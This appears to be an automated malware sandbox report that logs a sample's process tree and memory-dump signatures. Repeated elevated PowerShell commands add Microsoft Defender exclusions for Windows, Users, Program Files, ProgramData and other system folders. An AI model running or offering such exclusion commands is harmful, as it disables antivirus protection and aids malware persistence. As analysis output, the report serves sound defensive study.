MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 63
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 64
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 65
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 66
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 67
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 68
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 69
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 70
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 71
Start time: 12:08:24
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:72
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:73
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:74
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:75
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:76
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:77
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:78
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:79
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:80
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:81
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:82
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:83
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:84
                                                                                        Start time:12:08:36
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false


                                                                                          Execution Graph

                                                                                          Execution Coverage:5.3%
                                                                                          Dynamic/Decrypted Code Coverage:85.7%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:14
                                                                                          Total number of Limit Nodes:1
                                                                                          Execution graph (rendered graph omitted): the reachable nodes call ResumeThread (7ffd9ba4f12b), SuspendThread (7ffd9ba4d94b), GetFileAttributesW (7ffd9ba50f6f) and CloseHandle (7ffd9ba4f2df).
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 076e713cefbc0ba443af1926baa948b5fb7cb5092da932b235c1208e6d8abb8f
                                                                                          • Instruction ID: 24aa7de28495dd07c3bff21f3e5e2bb9af930fb04ddd479cee65380fc3dee7f1
                                                                                          • Opcode Fuzzy Hash: 076e713cefbc0ba443af1926baa948b5fb7cb5092da932b235c1208e6d8abb8f
                                                                                          • Instruction Fuzzy Hash: 4CA1ED71A19A8D8FEB99DF68C8657A9BFE1FB59300F4401BED089D72D2CB782901C741

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: b9b69696ea68bc768bb878f1f65dd8931cc816120a865c65e7040fd6a96bcda3
                                                                                          • Instruction ID: deedbb54b6b54a5c59dec1c559f7258a3202f5bfce8c94307bb459ea646f0f06
                                                                                          • Opcode Fuzzy Hash: b9b69696ea68bc768bb878f1f65dd8931cc816120a865c65e7040fd6a96bcda3
                                                                                          • Instruction Fuzzy Hash: 11517A7090C78C8FDB59DFA8D854AE9BFF0EF5A310F1441ABD049DB2A2DA759846CB01

                                                                                          Control-flow Graph

                                                                                          Control-flow graph (rendered graph omitted): function at 7ffd9ba4d93d, SuspendThread called in block 7ffd9ba4d954-7ffd9ba4da22.
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: SuspendThread
                                                                                          • String ID:
                                                                                          • API String ID: 3178671153-0
                                                                                          • Opcode ID: 9cc032ce37ee48f4272b148e465fc9f3ff460e237e4a134d7b199e45998f12ba
                                                                                          • Instruction ID: f686e5b2b64eabad27506785fbbfb676aefb3da7e2cb1a2588e6de49f002bbeb
                                                                                          • Opcode Fuzzy Hash: 9cc032ce37ee48f4272b148e465fc9f3ff460e237e4a134d7b199e45998f12ba
                                                                                          • Instruction Fuzzy Hash: 1B414B70D0864D8FDB98DF98D894AEDBBF0EB5A310F10416AD049E7292DA70A886CF40

                                                                                          Control-flow Graph

                                                                                          Control-flow graph (rendered graph omitted): function at 7ffd9ba50f4f, GetFileAttributesW called in block 7ffd9ba50f4f-7ffd9ba51033.
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 68e879e1ffb1f6004e0ca7469fc2043432b0505fe702d81a2a35da854e15743b
                                                                                          • Instruction ID: 717ac37b05ece12777ff226a8c999e472bafe99bf1f7c12025aa816f629a508a
                                                                                          • Opcode Fuzzy Hash: 68e879e1ffb1f6004e0ca7469fc2043432b0505fe702d81a2a35da854e15743b
                                                                                          • Instruction Fuzzy Hash: A0414970E0864C8FDB98DF98D895BEDBBF0EB5A310F1041AED049E7252DA74A885CF40

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 04ee0d6aadbebe27540e879060ffa170fdda9380f1a19778f34b0ea0ecfd1bf7
                                                                                          • Instruction ID: 843a690a149d9f3cf41811b5b17f5dbe1369ad56b65590a674069b6d489ce052
                                                                                          • Opcode Fuzzy Hash: 04ee0d6aadbebe27540e879060ffa170fdda9380f1a19778f34b0ea0ecfd1bf7
                                                                                          • Instruction Fuzzy Hash: A3517231E0964E8FEB59DF98D4605FCB7B1FF54300F2141BAC01AE72A6CA396A05CB40

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: d372791804d9d8e308b9ba5ef3da3bda664cde7ea03c9190de8476a503d81e21
                                                                                          • Instruction ID: 209efe6d871d43bf4ada8a6385dda58faf31c8d7ca9e9636f6591158561fc281
                                                                                          • Opcode Fuzzy Hash: d372791804d9d8e308b9ba5ef3da3bda664cde7ea03c9190de8476a503d81e21
                                                                                          • Instruction Fuzzy Hash: D2513831E0964E8FDB6CDFD8C4A45ADB7B1FF58300F1141AAC45AE72A2DA356A42CB40

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 9ea73733970e482aacefbe39a9942b886e80ee4ba956b852a49aa9c387a108ee
                                                                                          • Instruction ID: 83ba4f5450219bf3aa33c069bb9dacfdf5e3fa06bc230b19b99ea668bc2d3012
                                                                                          • Opcode Fuzzy Hash: 9ea73733970e482aacefbe39a9942b886e80ee4ba956b852a49aa9c387a108ee
                                                                                          • Instruction Fuzzy Hash: 7A416A70A0874C8FDB59DFA8D895BECBBF0FF16310F1041AAD049D7292DA75A886CB41

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P
                                                                                          • API String ID: 0-3110715001
                                                                                          • Opcode ID: b1ce6d5685ecb5856ac026e867556c8bd9cf24b350935c1720020e677fba9d85
                                                                                          • Instruction ID: 48c2e2edd60181b912fe8859379d2f90239cd0bf237a8c79d78c26f4c35e3afe
                                                                                          • Opcode Fuzzy Hash: b1ce6d5685ecb5856ac026e867556c8bd9cf24b350935c1720020e677fba9d85
                                                                                          • Instruction Fuzzy Hash: 02210E70E1595D8EEB74EB54CC987E9B7B1EB88306F1002E9C50DA62A1CB741AC58F44

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f026e4c018580b56db8d177b009a8790574023887c9f8b7da635b3ba4ba6cdb2
                                                                                          • Instruction ID: 785c49d7c37ec1c67f8d5ad4d22a041d0d80decdb07fcd0db25d2001a4cd06cc
                                                                                          • Opcode Fuzzy Hash: f026e4c018580b56db8d177b009a8790574023887c9f8b7da635b3ba4ba6cdb2
                                                                                          • Instruction Fuzzy Hash: 0132A630B19A1D8FDBA8DF58C8A5AB873E2FF54314F1142B9D05DC72A2DE25AD45CB80

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2699b157eb386e7c57aad3d1a6d1fc1867917e98a986d3c45f22c8c2c452d84b
                                                                                          • Instruction ID: 293d9ff5b6e2e2edfba7c18db5c27d21f32da6c1b92733a70244da5677d6cfa8
                                                                                          • Opcode Fuzzy Hash: 2699b157eb386e7c57aad3d1a6d1fc1867917e98a986d3c45f22c8c2c452d84b
                                                                                          • Instruction Fuzzy Hash: D232B531B19A1D8FDBA8DF58C8A5AB873E2FF54710F1102B9D01DC72A2DE25AD45CB80

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b798e5c48b0a7cd4e4717bbed950f06b3f0ecbbf6f1945f52d4ef058c009f65
                                                                                          • Instruction ID: 18eca70e1dfc97a912ffa5007df2e4859567d884d25a2a1a53df2554044da8ea
                                                                                          • Opcode Fuzzy Hash: 8b798e5c48b0a7cd4e4717bbed950f06b3f0ecbbf6f1945f52d4ef058c009f65
                                                                                          • Instruction Fuzzy Hash: 34E1B722B0EA8E4FEBA5DF6888746B877E1EF55300F4A01FAD04DC71E2DE19AD458741

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6013cf9da463058e5e658d58b2a19ebb6d5b9fc4b9647044aab741341bb7c3ec
                                                                                          • Instruction ID: 8e27e0d5ca638e317a319248e9649dd9c6244e382a3626ae2be7cd5f76a6fbd3
                                                                                          • Opcode Fuzzy Hash: 6013cf9da463058e5e658d58b2a19ebb6d5b9fc4b9647044aab741341bb7c3ec
                                                                                          • Instruction Fuzzy Hash: 4BD10530B0EB4A8FE378DF58D4A057577E1FF44314B11067ED48EC36A2DA2AB9498781

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db7818323c5d1bf537955cf4dfd5161561f568df228d87ffad02e949fc0575e0
                                                                                          • Instruction ID: 9060e14d3a6337b5ded0f559ae194bbea9ae7d84ddd93845e009beb65ffbe379
                                                                                          • Opcode Fuzzy Hash: db7818323c5d1bf537955cf4dfd5161561f568df228d87ffad02e949fc0575e0
                                                                                          • Instruction Fuzzy Hash: A5D12A33A0E6A65BD72AAFB8E8B54E57FA0EF4135870901B7D09DCB0D3ED2964168344

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9380cab9dfe90dc7de88c2537eb085b3ea547a758163aaf036bb9db1945f6fa1
                                                                                          • Instruction ID: d7de26e93489c58a36e7a4ddb645ef151a380e660eb57eb23ec34266c8ded6fa
                                                                                          • Opcode Fuzzy Hash: 9380cab9dfe90dc7de88c2537eb085b3ea547a758163aaf036bb9db1945f6fa1
                                                                                          • Instruction Fuzzy Hash: 1151F331E0D56ECAE36ABF98A8655F877A0EF00714F1502BBD04E871E7DE6A29018785

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f8e3843ddfad2e3ac4cb93e2aa49d997b7a9696c2526439ddc3a3f25ebd1ed0
                                                                                          • Instruction ID: cb68f1a5a6702a3d1af0caf558a551c880b4774e8ce80752ffe214cacdb0eaff
                                                                                          • Opcode Fuzzy Hash: 5f8e3843ddfad2e3ac4cb93e2aa49d997b7a9696c2526439ddc3a3f25ebd1ed0
                                                                                          • Instruction Fuzzy Hash: 54D1C13061955A8FEB59CF48C0E05B037A1FF45314B6586FDC85B8B69BCA39F986CB80

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18770983cb6658e641dc1b4fe0c4322c74366994e175e6a3bacef077739523fa
                                                                                          • Instruction ID: e28046cb23cdf26845fb2a13ed29c48c62dec902b69854e9c9aa1ec5386e8738
                                                                                          • Opcode Fuzzy Hash: 18770983cb6658e641dc1b4fe0c4322c74366994e175e6a3bacef077739523fa
                                                                                          • Instruction Fuzzy Hash: 0EC1F33061955A8BEB2DCF48C0E05B137A1FF45304B6586FDD85B8B69BCA39F985CB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77df870486cf30bbe7d265ce9318ac20ffa9f18611a9658d524e058668764740
                                                                                          • Instruction ID: a5fafea0f5a7e3545c355013d46d791812c193f185045acec9bc75734ad2aa45
                                                                                          • Opcode Fuzzy Hash: 77df870486cf30bbe7d265ce9318ac20ffa9f18611a9658d524e058668764740
                                                                                          • Instruction Fuzzy Hash: 4A51C331A1866D8FDB59FFA8E4A4AEDBBA0FF48315F1401BBD049D7196DE346881C780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7ed0ca1b4b4948ae7c337e6bcebe1540dfaa2208542a697a3752d6aa37192fc
                                                                                          • Instruction ID: e70418222cfccaabce4dc4664b11af01c7b7c489996271c2d508ed4f80384ae8
                                                                                          • Opcode Fuzzy Hash: b7ed0ca1b4b4948ae7c337e6bcebe1540dfaa2208542a697a3752d6aa37192fc
                                                                                          • Instruction Fuzzy Hash: 7851A031A1865D8FDB59FFA8E4A5AEDBBA0FF48314F1401BBD049D7196DE34A881C780
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
